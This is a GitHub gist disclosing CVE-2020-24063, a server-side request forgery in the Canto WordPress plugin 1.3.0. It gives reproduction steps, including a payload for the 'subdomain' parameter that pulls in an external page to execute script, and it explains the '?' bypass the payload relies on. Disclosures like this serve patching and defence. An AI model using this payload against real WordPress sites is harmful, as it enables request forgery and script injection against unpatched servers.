Last active
November 9, 2020 16:07
-
-
Save Hakooraevil/264cb21034f946eee62371e9111c36bb to your computer and use it in GitHub Desktop.
SSRF in Canto Plugin for Wordpress (CVE-2020-24063)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Description | |
| The Canto plugin 1.3.0 for WordPress allows includes/lib/download.php?subdomain= SSRF. | |
| "subdomain" parameter in Canto WordPress Plugin is vulnerable to | |
| Server-Side Request Forgery (SSRF) which allows an attacker to make a | |
| request to an internal or external server & retrieve content hosted on | |
| the server. Due to this, an attacker can perform attacks such as | |
| Cross-Site Scripting, Cross-Site Port Attack, abuse Cross-Origin | |
| resource sharing, or access internal resources hosted on the server. | |
| #Reference: CVE-2020-24063 | |
| #Steps to Reproduce: | |
| 1. Navigate to "<wordpress_server>/wp-content/plugins/canto/includes/lib/download.php?subdomain=" | |
| 2. Add following payload "xss-game.appspot.com/level1/frame?query=<script>alert(document.domain)</script>?" to "subdomain=" parameter. | |
| 3. Observe the XSS is executed. | |
| Please Note: Using "?" in the payload is mandatory as it acts as a bypass to conduct this attack. | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment